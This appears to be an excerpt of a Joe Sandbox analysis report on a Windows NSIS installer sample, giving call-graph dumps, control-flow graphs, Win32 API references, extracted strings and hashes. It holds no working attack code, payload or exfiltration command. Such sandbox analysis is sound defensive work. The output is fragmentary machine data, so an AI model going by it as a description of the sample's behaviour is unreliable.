4328->4303 4329->4330 4331 4062a3 11 API calls 4330->4331 4333 401c34 4331->4333 4334 401b93 4332->4334 4335 401b53 4332->4335 4336 405ca0 MessageBoxIndirectW 4333->4336 4337 4062a3 11 API calls 4334->4337 4338 4062a3 11 API calls 4335->4338 4336->4323 4337->4323 4338->4339 4339->4309 4340->4303 4341->4297 4342->4298 5013 40209f GetDlgItem GetClientRect 5014 40145c 18 API calls 5013->5014 5015 4020cf LoadImageW SendMessageW 5014->5015 5016 4030e3 5015->5016 5017 4020ed DeleteObject 5015->5017 5017->5016 5018 402b9f 5019 401446 18 API calls 5018->5019 5024 402ba7 5019->5024 5020 402c4a 5021 402bdf ReadFile 5023 402c3d 5021->5023 5021->5024 5022 401446 18 API calls 5022->5023 5023->5020 5023->5022 5030 402d17 ReadFile 5023->5030 5024->5020 5024->5021 5024->5023 5025 402c06 MultiByteToWideChar 5024->5025 5026 402c3f 5024->5026 5028 402c4f 5024->5028 5025->5024 5025->5028 5031 405f51 wsprintfW 5026->5031 5028->5023 5029 402c6b SetFilePointer 5028->5029 5029->5023 5030->5023 5031->5020 5032 402b23 GlobalAlloc 5033 402b39 5032->5033 5034 402b4b 5032->5034 5035 401446 18 API calls 5033->5035 5036 40145c 18 API calls 5034->5036 5037 402b41 5035->5037 5038 402b52 WideCharToMultiByte lstrlenA 5036->5038 5039 402b93 5037->5039 5040 402b84 WriteFile 5037->5040 5038->5037 5040->5039 5041 402384 GlobalFree 5040->5041 5041->5039 5043 4044a5 5044 404512 5043->5044 5045 4044df 5043->5045 5047 40451f GetDlgItem GetAsyncKeyState 5044->5047 5054 4045b1 5044->5054 5111 405c84 GetDlgItemTextW 5045->5111 5050 40453e GetDlgItem 5047->5050 5057 40455c 5047->5057 5048 4044ea 5051 406038 5 API calls 5048->5051 5049 40469d 5109 404833 5049->5109 5113 405c84 GetDlgItemTextW 5049->5113 5052 403d3f 19 API calls 5050->5052 5053 4044f0 5051->5053 5056 404551 ShowWindow 5052->5056 5059 403e74 5 API calls 5053->5059 5054->5049 5060 406805 18 API calls 5054->5060 5054->5109 5056->5057 5062 404579 SetWindowTextW 5057->5062 5067 405d59 4 API calls 5057->5067 5058 403dca 8 API calls 5063 404847 5058->5063 5064 4044f5 GetDlgItem 5059->5064 5065 40462f SHBrowseForFolderW 5060->5065 5061 4046c9 5066 40677e 18 API calls 5061->5066 5068 403d3f 19 API calls 5062->5068 5069 404503 IsDlgButtonChecked 5064->5069 5064->5109 5065->5049 5070 404647 CoTaskMemFree 5065->5070 5071 4046cf 5066->5071 5072 40456f 5067->5072 5073 404597 5068->5073 5069->5044 5074 406722 3 API calls 5070->5074 5114 406009 lstrcpynW 5071->5114 5072->5062 5078 406722 3 API calls 5072->5078 5075 403d3f 19 API calls 5073->5075 5076 404654 5074->5076 5079 4045a2 5075->5079 5080 40468b SetDlgItemTextW 5076->5080 5085 406805 18 API calls 5076->5085 5078->5062 5112 403d98 SendMessageW 5079->5112 5080->5049 5081 4046e6 5083 4062fc 3 API calls 5081->5083 5092 4046ee 5083->5092 5084 4045aa 5088 4062fc 3 API calls 5084->5088 5086 404673 lstrcmpiW 5085->5086 5086->5080 5089 404684 lstrcatW 5086->5089 5087 404730 5115 406009 lstrcpynW 5087->5115 5088->5054 5089->5080 5091 404739 5093 405d59 4 API calls 5091->5093 5092->5087 5097 406751 2 API calls 5092->5097 5098 404785 5092->5098 5094 40473f GetDiskFreeSpaceW 5093->5094 5096 404763 MulDiv 5094->5096 5094->5098 5096->5098 5097->5092 5100 4047e2 5098->5100 5101 4043ad 21 API calls 5098->5101 5099 404805 5116 403d85 KiUserCallbackDispatcher 5099->5116 5100->5099 5102 40141d 80 API calls 5100->5102 5103 4047d3 5101->5103 5102->5099 5105 4047e4 SetDlgItemTextW 5103->5105 5106 4047d8 5103->5106 5105->5100 5107 4043ad 21 API calls 5106->5107 5107->5100 5108 404821 5108->5109 5117 403d61 5108->5117 5109->5058 5111->5048 5112->5084 5113->5061 5114->5081 5115->5091 5116->5108 5118 403d74 SendMessageW 5117->5118 5119 403d6f 5117->5119 5118->5109 5119->5118 5120 402da5 5121 4030e3 5120->5121 5122 402dac 5120->5122 5123 401446 18 API calls 5122->5123 5124 402db8 5123->5124 5125 402dbf SetFilePointer 5124->5125 5125->5121 5126 402dcf 5125->5126 5126->5121 5128 405f51 wsprintfW 5126->5128 5128->5121 5129 4030a9 SendMessageW 5130 4030c2 InvalidateRect 5129->5130 5131 4030e3 5129->5131 5130->5131 5132 401cb2 5133 40145c 18 API calls 5132->5133 5134 401c54 5133->5134 5135 4062a3 11 API calls 5134->5135 5138 401c64 5134->5138 5136 401c59 5135->5136 5137 406c9b 81 API calls 5136->5137 5137->5138 4088 4021b5 4089 40145c 18 API calls 4088->4089 4090 4021bb 4089->4090 4091 40145c 18 API calls 4090->4091 4092 4021c4 4091->4092 4093 40145c 18 API calls 4092->4093 4094 4021cd 4093->4094 4095 40145c 18 API calls 4094->4095 4096 4021d6 4095->4096 4097 404f72 25 API calls 4096->4097 4098 4021e2 ShellExecuteW 4097->4098 4099 40221b 4098->4099 4100 40220d 4098->4100 4102 4062a3 11 API calls 4099->4102 4101 4062a3 11 API calls 4100->4101 4101->4099 4103 402230 4102->4103 5146 402238 5147 40145c 18 API calls 5146->5147 5148 40223e 5147->5148 5149 4062a3 11 API calls 5148->5149 5150 40224b 5149->5150 5151 404f72 25 API calls 5150->5151 5152 402255 5151->5152 5153 405c3f 2 API calls 5152->5153 5154 40225b 5153->5154 5155 4062a3 11 API calls 5154->5155 5158 4022ac CloseHandle 5154->5158 5161 40226d 5155->5161 5157 4030e3 5158->5157 5159 402283 WaitForSingleObject 5160 402291 GetExitCodeProcess 5159->5160 5159->5161 5160->5158 5163 4022a3 5160->5163 5161->5158 5161->5159 5162 406332 2 API calls 5161->5162 5162->5159 5165 405f51 wsprintfW 5163->5165 5165->5158 5166 4040b8 5167 4040d3 5166->5167 5175 404201 5166->5175 5171 40410e 5167->5171 5197 403fca WideCharToMultiByte 5167->5197 5168 40426c 5169 404276 GetDlgItem 5168->5169 5170 40433e 5168->5170 5172 404290 5169->5172 5173 4042ff 5169->5173 5176 403dca 8 API calls 5170->5176 5178 403d3f 19 API calls 5171->5178 5172->5173 5181 4042b6 6 API calls 5172->5181 5173->5170 5182 404311 5173->5182 5175->5168 5175->5170 5177 40423b GetDlgItem SendMessageW 5175->5177 5180 404339 5176->5180 5202 403d85 KiUserCallbackDispatcher 5177->5202 5179 40414e 5178->5179 5184 403d3f 19 API calls 5179->5184 5181->5173 5185 404327 5182->5185 5186 404317 SendMessageW 5182->5186 5189 40415b CheckDlgButton 5184->5189 5185->5180 5190 40432d SendMessageW 5185->5190 5186->5185 5187 404267 5188 403d61 SendMessageW 5187->5188 5188->5168 5200 403d85 KiUserCallbackDispatcher 5189->5200 5190->5180 5192 404179 GetDlgItem 5201 403d98 SendMessageW 5192->5201 5194 40418f SendMessageW 5195 4041b5 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 5194->5195 5196 4041ac GetSysColor 5194->5196 5195->5180 5196->5195 5198 404007 5197->5198 5199 403fe9 GlobalAlloc WideCharToMultiByte 5197->5199 5198->5171 5199->5198 5200->5192 5201->5194 5202->5187 4197 401eb9 4198 401f24 4197->4198 4199 401ec6 4197->4199 4200 401f53 GlobalAlloc 4198->4200 4201 401f28 4198->4201 4202 401ed5 4199->4202 4209 401ef7 4199->4209 4203 406805 18 API calls 4200->4203 4208 4062a3 11 API calls 4201->4208 4213 401f36 4201->4213 4204 4062a3 11 API calls 4202->4204 4207 401f46 4203->4207 4205 401ee2 4204->4205 4210 402708 4205->4210 4215 406805 18 API calls 4205->4215 4207->4210 4211 402387 GlobalFree 4207->4211 4208->4213 4219 406009 lstrcpynW 4209->4219 4211->4210 4221 406009 lstrcpynW 4213->4221 4214 401f06 4220 406009 lstrcpynW 4214->4220 4215->4205 4217 401f15 4222 406009 lstrcpynW 4217->4222 4219->4214 4220->4217 4221->4207 4222->4210 5203 4074bb 5205 407344 5203->5205 5204 407c6d 5205->5204 5206 4073c2 GlobalFree 5205->5206 5207 4073cb GlobalAlloc 5205->5207 5208 407443 GlobalAlloc 5205->5208 5209 40743a GlobalFree 5205->5209 5206->5207 5207->5204 5207->5205 5208->5204 5208->5205 5209->5208

                                                                                                                                    Executed Functions

                                                                                                                                    Function 004050CD Relevance: 68.5, APIs: 36, Strings: 3, Instructions: 295windowclipboardmemoryCOMMON
                                                                                                                                    Download Yara Rule

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 0 4050cd-4050e8 1 405295-40529c 0->1 2 4050ee-4051d5 GetDlgItem * 3 call 403d98 call 404476 call 406805 call 4062a3 GetClientRect GetSystemMetrics SendMessageW * 2 0->2 3 4052c6-4052d3 1->3 4 40529e-4052c0 GetDlgItem CreateThread CloseHandle 1->4 35 4051f3-4051f6 2->35 36 4051d7-4051f1 SendMessageW * 2 2->36 6 4052f4-4052fb 3->6 7 4052d5-4052de 3->7 4->3 11 405352-405356 6->11 12 4052fd-405303 6->12 9 4052e0-4052ef ShowWindow * 2 call 403d98 7->9 10 405316-40531f call 403dca 7->10 9->6 22 405324-405328 10->22 11->10 14 405358-40535b 11->14 16 405305-405311 call 403d18 12->16 17 40532b-40533b ShowWindow 12->17 14->10 20 40535d-405370 SendMessageW 14->20 16->10 23 40534b-40534d call 403d18 17->23 24 40533d-405346 call 404f72 17->24 27 405376-405397 CreatePopupMenu call 406805 AppendMenuW 20->27 28 40528e-405290 20->28 23->11 24->23 37 405399-4053aa GetWindowRect 27->37 38 4053ac-4053b2 27->38 28->22 39 405206-40521d call 403d3f 35->39 40 4051f8-405204 SendMessageW 35->40 36->35 41 4053b3-4053cb TrackPopupMenu 37->41 38->41 46 405253-405274 GetDlgItem SendMessageW 39->46 47 40521f-405233 ShowWindow 39->47 40->39 41->28 43 4053d1-4053e8 41->43 45 4053ed-405408 SendMessageW 43->45 45->45 48 40540a-40542d OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 45->48 46->28 51 405276-40528c SendMessageW * 2 46->51 49 405242 47->49 50 405235-405240 ShowWindow 47->50 52 40542f-405458 SendMessageW 48->52 53 405248-40524e call 403d98 49->53 50->53 51->28 52->52 54 40545a-405474 GlobalUnlock SetClipboardData CloseClipboard 52->54 53->46 54->28
                                                                                                                                    APIs
                                                                                                                                    • GetDlgItem.USER32(?,00000403), ref: 0040512F
                                                                                                                                    • GetDlgItem.USER32(?,000003EE), ref: 0040513E
                                                                                                                                    • GetClientRect.USER32(?,?), ref: 00405196
                                                                                                                                    • GetSystemMetrics.USER32(00000015), ref: 0040519E
                                                                                                                                    • SendMessageW.USER32(?,00001061,00000000,00000002), ref: 004051BF
                                                                                                                                    • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004051D0
                                                                                                                                    • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004051E3
                                                                                                                                    • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004051F1
                                                                                                                                    • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405204
                                                                                                                                    • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405226
                                                                                                                                    • ShowWindow.USER32(?,00000008), ref: 0040523A
                                                                                                                                    • GetDlgItem.USER32(?,000003EC), ref: 0040525B
                                                                                                                                    • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 0040526B
                                                                                                                                    • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 00405280
                                                                                                                                    • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 0040528C
                                                                                                                                    • GetDlgItem.USER32(?,000003F8), ref: 0040514D
                                                                                                                                      • Part of subcall function 00403D98: SendMessageW.USER32(00000028,?,00000001,004057B4), ref: 00403DA6
                                                                                                                                      • Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                                                                                                                                      • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                                                                                      • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                                                                                    • GetDlgItem.USER32(?,000003EC), ref: 004052AB
                                                                                                                                    • CreateThread.KERNELBASE(00000000,00000000,Function_00005047,00000000), ref: 004052B9
                                                                                                                                    • CloseHandle.KERNELBASE(00000000), ref: 004052C0
                                                                                                                                    • ShowWindow.USER32(00000000), ref: 004052E7
                                                                                                                                    • ShowWindow.USER32(?,00000008), ref: 004052EC
                                                                                                                                    • ShowWindow.USER32(00000008), ref: 00405333
                                                                                                                                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405365
                                                                                                                                    • CreatePopupMenu.USER32 ref: 00405376
                                                                                                                                    • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 0040538B
                                                                                                                                    • GetWindowRect.USER32(?,?), ref: 0040539E
                                                                                                                                    • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004053C0
                                                                                                                                    • SendMessageW.USER32(?,00001073,00000000,?), ref: 004053FB
                                                                                                                                    • OpenClipboard.USER32(00000000), ref: 0040540B
                                                                                                                                    • EmptyClipboard.USER32 ref: 00405411
                                                                                                                                    • GlobalAlloc.KERNEL32(00000042,00000000,?,?,00000000,?,00000000), ref: 0040541D
                                                                                                                                    • GlobalLock.KERNEL32(00000000), ref: 00405427
                                                                                                                                    • SendMessageW.USER32(?,00001073,00000000,?), ref: 0040543B
                                                                                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 0040545D
                                                                                                                                    • SetClipboardData.USER32(0000000D,00000000), ref: 00405468
                                                                                                                                    • CloseClipboard.USER32 ref: 0040546E
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2107068898.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2107048860.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107130191.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107184321.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107184321.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107184321.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107287418.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_hlyG1m5UmO.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlockVersionlstrlenwvsprintf
                                                                                                                                    • String ID: @rD$New install of "%s" to "%s"${
                                                                                                                                    • API String ID: 2110491804-2409696222
                                                                                                                                    • Opcode ID: f168db28b2c12902a58862b60cbdcc3c6e49ead995c60d9878de2ccec3fe74d8
                                                                                                                                    • Instruction ID: 480b9f2609884c7685ddca5963e0cfcc77f9e358d06567921943d8ab7e89b76b
                                                                                                                                    • Opcode Fuzzy Hash: f168db28b2c12902a58862b60cbdcc3c6e49ead995c60d9878de2ccec3fe74d8
                                                                                                                                    • Instruction Fuzzy Hash: 14B15B70800608FFDB11AFA0DD85EAE7B79EF44355F00803AFA45BA1A0CBB49A519F59
                                                                                                                                    Function 00403883 Relevance: 54.6, APIs: 22, Strings: 9, Instructions: 304filestringcomCOMMON
                                                                                                                                    Download Yara Rule

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 305 403883-403919 #17 SetErrorMode OleInitialize call 4062fc SHGetFileInfoW call 406009 GetCommandLineW call 406009 GetModuleHandleW 312 403923-403937 call 405d06 CharNextW 305->312 313 40391b-40391e 305->313 316 4039ca-4039d0 312->316 313->312 317 4039d6 316->317 318 40393c-403942 316->318 319 4039f5-403a0d GetTempPathW call 4037cc 317->319 320 403944-40394a 318->320 321 40394c-403950 318->321 328 403a33-403a4d DeleteFileW call 403587 319->328 329 403a0f-403a2d GetWindowsDirectoryW lstrcatW call 4037cc 319->329 320->320 320->321 323 403952-403957 321->323 324 403958-40395c 321->324 323->324 326 4039b8-4039c5 call 405d06 324->326 327 40395e-403965 324->327 326->316 342 4039c7 326->342 331 403967-40396e 327->331 332 40397a-40398c call 403800 327->332 345 403acc-403adb call 403859 CoUninitialize 328->345 346 403a4f-403a55 328->346 329->328 329->345 333 403970-403973 331->333 334 403975 331->334 343 4039a1-4039b6 call 403800 332->343 344 40398e-403995 332->344 333->332 333->334 334->332 342->316 343->326 361 4039d8-4039f0 call 407d6e call 406009 343->361 348 403997-40399a 344->348 349 40399c 344->349 359 403ae1-403af1 call 405ca0 ExitProcess 345->359 360 403bce-403bd4 345->360 351 403ab5-403abc call 40592c 346->351 352 403a57-403a60 call 405d06 346->352 348->343 348->349 349->343 358 403ac1-403ac7 call 4060e7 351->358 362 403a79-403a7b 352->362 358->345 365 403c51-403c59 360->365 366 403bd6-403bf3 call 4062fc * 3 360->366 361->319 370 403a62-403a74 call 403800 362->370 371 403a7d-403a87 362->371 372 403c5b 365->372 373 403c5f 365->373 397 403bf5-403bf7 366->397 398 403c3d-403c48 ExitWindowsEx 366->398 370->371 384 403a76 370->384 378 403af7-403b11 lstrcatW lstrcmpiW 371->378 379 403a89-403a99 call 40677e 371->379 372->373 378->345 383 403b13-403b29 CreateDirectoryW SetCurrentDirectoryW 378->383 379->345 390 403a9b-403ab1 call 406009 * 2 379->390 387 403b36-403b56 call 406009 * 2 383->387 388 403b2b-403b31 call 406009 383->388 384->362 404 403b5b-403b77 call 406805 DeleteFileW 387->404 388->387 390->351 397->398 402 403bf9-403bfb 397->402 398->365 401 403c4a-403c4c call 40141d 398->401 401->365 402->398 406 403bfd-403c0f GetCurrentProcess 402->406 412 403bb8-403bc0 404->412 413 403b79-403b89 CopyFileW 404->413 406->398 411 403c11-403c33 406->411 411->398 412->404 414 403bc2-403bc9 call 406c68 412->414 413->412 415 403b8b-403bab call 406c68 call 406805 call 405c3f 413->415 414->345 415->412 425 403bad-403bb4 CloseHandle 415->425 425->412
                                                                                                                                    APIs
                                                                                                                                    • #17.COMCTL32 ref: 004038A2
                                                                                                                                    • SetErrorMode.KERNELBASE(00008001), ref: 004038AD
                                                                                                                                    • OleInitialize.OLE32(00000000), ref: 004038B4
                                                                                                                                      • Part of subcall function 004062FC: GetModuleHandleA.KERNEL32(?,?,00000020,004038C6,00000008), ref: 0040630A
                                                                                                                                      • Part of subcall function 004062FC: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038C6,00000008), ref: 00406315
                                                                                                                                      • Part of subcall function 004062FC: GetProcAddress.KERNEL32(00000000), ref: 00406327
                                                                                                                                    • SHGetFileInfoW.SHELL32(00409264,00000000,?,000002B4,00000000), ref: 004038DC
                                                                                                                                      • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                                                                                                                                    • GetCommandLineW.KERNEL32(0046ADC0,NSIS Error), ref: 004038F1
                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000,004C30A0,00000000), ref: 00403904
                                                                                                                                    • CharNextW.USER32(00000000,004C30A0,00000020), ref: 0040392B
                                                                                                                                    • GetTempPathW.KERNEL32(00002004,004D70C8,00000000,00000020), ref: 00403A00
                                                                                                                                    • GetWindowsDirectoryW.KERNEL32(004D70C8,00001FFF), ref: 00403A15
                                                                                                                                    • lstrcatW.KERNEL32(004D70C8,\Temp), ref: 00403A21
                                                                                                                                    • DeleteFileW.KERNELBASE(004D30C0), ref: 00403A38
                                                                                                                                    • CoUninitialize.COMBASE(?), ref: 00403AD1
                                                                                                                                    • ExitProcess.KERNEL32 ref: 00403AF1
                                                                                                                                    • lstrcatW.KERNEL32(004D70C8,~nsu.tmp), ref: 00403AFD
                                                                                                                                    • lstrcmpiW.KERNEL32(004D70C8,004CF0B8,004D70C8,~nsu.tmp), ref: 00403B09
                                                                                                                                    • CreateDirectoryW.KERNEL32(004D70C8,00000000), ref: 00403B15
                                                                                                                                    • SetCurrentDirectoryW.KERNEL32(004D70C8), ref: 00403B1C
                                                                                                                                    • DeleteFileW.KERNEL32(004331E8,004331E8,?,00477008,00409204,00473000,?), ref: 00403B6D
                                                                                                                                    • CopyFileW.KERNEL32(004DF0D8,004331E8,00000001), ref: 00403B81
                                                                                                                                    • CloseHandle.KERNEL32(00000000,004331E8,004331E8,?,004331E8,00000000), ref: 00403BAE
                                                                                                                                    • GetCurrentProcess.KERNEL32(00000028,00000005,00000005,00000004,00000003), ref: 00403C04
                                                                                                                                    • ExitWindowsEx.USER32(00000002,00000000), ref: 00403C40
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2107068898.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2107048860.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107130191.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107184321.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107184321.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107184321.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107287418.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_hlyG1m5UmO.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: File$DirectoryHandle$CurrentDeleteExitModuleProcessWindowslstrcat$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextPathProcTempUninitializelstrcmpilstrcpyn
                                                                                                                                    • String ID: /D=$ _?=$Error launching installer$NCRC$NSIS Error$SeShutdownPrivilege$\Temp$~nsu.tmp$1C
                                                                                                                                    • API String ID: 2435955865-239407132
                                                                                                                                    • Opcode ID: b4c90e19bc4a522d6528af1b5983b0f211df9e73c6af6eb8e5ff34ebe7c06cb6
                                                                                                                                    • Instruction ID: 7cf1fa831aca86d96b8495533088dbe4cf0b0326274ef0a42366eb07f7c747b9
                                                                                                                                    • Opcode Fuzzy Hash: b4c90e19bc4a522d6528af1b5983b0f211df9e73c6af6eb8e5ff34ebe7c06cb6
                                                                                                                                    • Instruction Fuzzy Hash: C4A1B671544305BAD6207F629D4AF1B3EACAF0070AF15483FF585B61D2DBBC8A448B6E
                                                                                                                                    Function 004074BB Relevance: 5.4, APIs: 4, Instructions: 382COMMON
                                                                                                                                    Download Yara Rule

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 820 4074bb-4074c0 821 4074c2-4074ef 820->821 822 40752f-407547 820->822 824 4074f1-4074f4 821->824 825 4074f6-4074fa 821->825 823 407aeb-407aff 822->823 829 407b01-407b17 823->829 830 407b19-407b2c 823->830 826 407506-407509 824->826 827 407502 825->827 828 4074fc-407500 825->828 831 407527-40752a 826->831 832 40750b-407514 826->832 827->826 828->826 833 407b33-407b3a 829->833 830->833 836 4076f6-407713 831->836 837 407516 832->837 838 407519-407525 832->838 834 407b61-407c68 833->834 835 407b3c-407b40 833->835 851 407350 834->851 852 407cec 834->852 840 407b46-407b5e 835->840 841 407ccd-407cd4 835->841 843 407715-407729 836->843 844 40772b-40773e 836->844 837->838 839 407589-4075b6 838->839 847 4075d2-4075ec 839->847 848 4075b8-4075d0 839->848 840->834 845 407cdd-407cea 841->845 849 407741-40774b 843->849 844->849 850 407cef-407cf6 845->850 853 4075f0-4075fa 847->853 848->853 854 40774d 849->854 855 4076ee-4076f4 849->855 856 407357-40735b 851->856 857 40749b-4074b6 851->857 858 40746d-407471 851->858 859 4073ff-407403 851->859 852->850 862 407600 853->862 863 407571-407577 853->863 864 407845-4078a1 854->864 865 4076c9-4076cd 854->865 855->836 861 407692-40769c 855->861 856->845 866 407361-40736e 856->866 857->823 871 407c76-407c7d 858->871 872 407477-40748b 858->872 877 407409-407420 859->877 878 407c6d-407c74 859->878 867 4076a2-4076c4 861->867 868 407c9a-407ca1 861->868 880 407556-40756e 862->880 881 407c7f-407c86 862->881 869 40762a-407630 863->869 870 40757d-407583 863->870 864->823 873 407c91-407c98 865->873 874 4076d3-4076eb 865->874 866->852 882 407374-4073ba 866->882 867->864 868->845 883 40768e 869->883 884 407632-40764f 869->884 870->839 870->883 871->845 879 40748e-407496 872->879 873->845 874->855 885 407423-407427 877->885 878->845 879->858 889 407498 879->889 880->863 881->845 887 4073e2-4073e4 882->887 888 4073bc-4073c0 882->888 883->861 890 407651-407665 884->890 891 407667-40767a 884->891 885->859 886 407429-40742f 885->886 893 407431-407438 886->893 894 407459-40746b 886->894 897 4073f5-4073fd 887->897 898 4073e6-4073f3 887->898 895 4073c2-4073c5 GlobalFree 888->895 896 4073cb-4073d9 GlobalAlloc 888->896 889->857 892 40767d-407687 890->892 891->892 892->869 899 407689 892->899 900 407443-407453 GlobalAlloc 893->900 901 40743a-40743d GlobalFree 893->901 894->879 895->896 896->852 902 4073df 896->902 897->885 898->897 898->898 904 407c88-407c8f 899->904 905 40760f-407627 899->905 900->852 900->894 901->900 902->887 904->845 905->869
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2107068898.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2107048860.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107130191.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107184321.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107184321.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107184321.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107287418.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_hlyG1m5UmO.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 40903ab5852a4d5be4c36b37cb9ac035c10bc9e934730a02f9966fb4d26bd2b9
                                                                                                                                    • Instruction ID: b44593247c4c050b0e646bb53675e7b1a8962b0b92449cff70e8ee1879f4dc4f
                                                                                                                                    • Opcode Fuzzy Hash: 40903ab5852a4d5be4c36b37cb9ac035c10bc9e934730a02f9966fb4d26bd2b9
                                                                                                                                    • Instruction Fuzzy Hash: 00F14871908249DBDF18CF28C8946E93BB1FF44345F14852AFD5A9B281D338E986DF86
                                                                                                                                    Function 004062FC Relevance: 4.5, APIs: 3, Instructions: 18libraryloaderCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • GetModuleHandleA.KERNEL32(?,?,00000020,004038C6,00000008), ref: 0040630A
                                                                                                                                    • LoadLibraryA.KERNELBASE(?,?,?,00000020,004038C6,00000008), ref: 00406315
                                                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 00406327
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2107068898.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2107048860.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107130191.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107184321.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107184321.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107184321.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107287418.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_hlyG1m5UmO.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: AddressHandleLibraryLoadModuleProc
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 310444273-0
                                                                                                                                    • Opcode ID: a32725a6e723fbcd4130456278775f3bec070c67c36dcd31cef0056e0dec9b78
                                                                                                                                    • Instruction ID: 23f85fcbdf3119ad7ff9d94b99dcad510d7c567b01d836bd9cab37df641e0753
